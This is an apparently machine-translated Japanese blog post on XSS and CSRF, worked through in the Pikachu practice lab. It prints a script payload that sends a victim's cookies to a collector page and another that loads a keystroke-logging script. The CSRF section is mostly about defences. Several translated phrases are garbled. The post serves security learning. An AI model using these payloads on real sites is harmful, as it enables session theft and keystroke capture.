XSS および CSRF の脆弱性

XSS 脆弱性の概要

XSS (クロスサイト スクリプティング)、つまりクロスサイト スクリプティング攻撃とは、攻撃者が Web サーバーのコードの抜け穴を利用して、クライアント側のスクリプト (通常は JavaScript で書かれた悪意のあるコード) をページに埋め込むことを意味します。サーバーのユーザーが Web サイト内の悪意のあるスクリプト コードを含むページにアクセスすると、ユーザーのブラウザは自動的に悪意のあるコードを読み込んで実行し、攻撃の目的を達成します。

XSS 分類

  • 反射型 XSS
  • 保存された XSS
  • DOM型XSS

XSS の脆弱性を利用して攻撃を実行する方法

XSS を使用してユーザーの Cookie を盗む

ピカチュウのXSSバックグラウンド管理を利用することができ、リフレクティブgetにコードを入力するとXSSバックグラウンド管理の情報を見ることができます。ここでのパスは、独自のファイル パスに基づく必要があります。

<script> document.location = 'http://localhost/pikachu-master/pkxss/xcookie/cookie.php?cookie='+document.cookie; </script>

論理的に言えば、XSS ストレージ タイプも可能ですが、XSS ストレージ タイプ テストを使用する場合、XSS ストレージ インターフェイスに入るたびに、index.php にジャンプすることになることに注意してください。データベースに移動し、挿入されたスクリプトを削除します。データはpikachu.messageにあります。

XSS を使用したフィッシング

PHP の HTTP 認証メカニズムは、PHP が Apache モジュールとして実行されている場合にのみ機能するため、この機能は CGI バージョンでは使用できません。スモールレザーパネルを使用しているため、デフォルトではCGI/FastCGIを使用しており、ピカチュウ射撃場での釣りは成功していません。

XSS を使用したキーボード監視

<script  src=" http://localhost/pikachu-master/pkxss/rkeypress/rk.js"></script>

CSRF 脆弱性の概要

CSRF(Cross-Site Request Forgery)、つまりクロスサイトリクエストフォージェリ攻撃。攻撃者は、あなたのログイン情報を盗み、あなたの身元でさまざまなリクエストの送信をシミュレートすることができます。このリクエストはサーバーにとって完全に合法ですが、あなたの名前で電子メールを送信する、メッセージを送信する、アカウントを盗むなど、攻撃者が予期する操作を完了します。システム管理者の追加、商品の購入、仮想通貨の送金なども可能です。

CSRF脆弱性攻撃の状況

  1. 信頼できる Web サイト A にログインし、ローカルで Cookie を生成します。
  2. ウェブサイト A からログアウトせずに危険なウェブサイト B にアクセスする

CSRF防御

  • HTTP リファラーフィールドを検証する
  • トークンを追加して検証する
  • HTTP ヘッダーのカスタム属性と検証

おすすめ

転載: blog.csdn.net/Hacker0830/article/details/129975243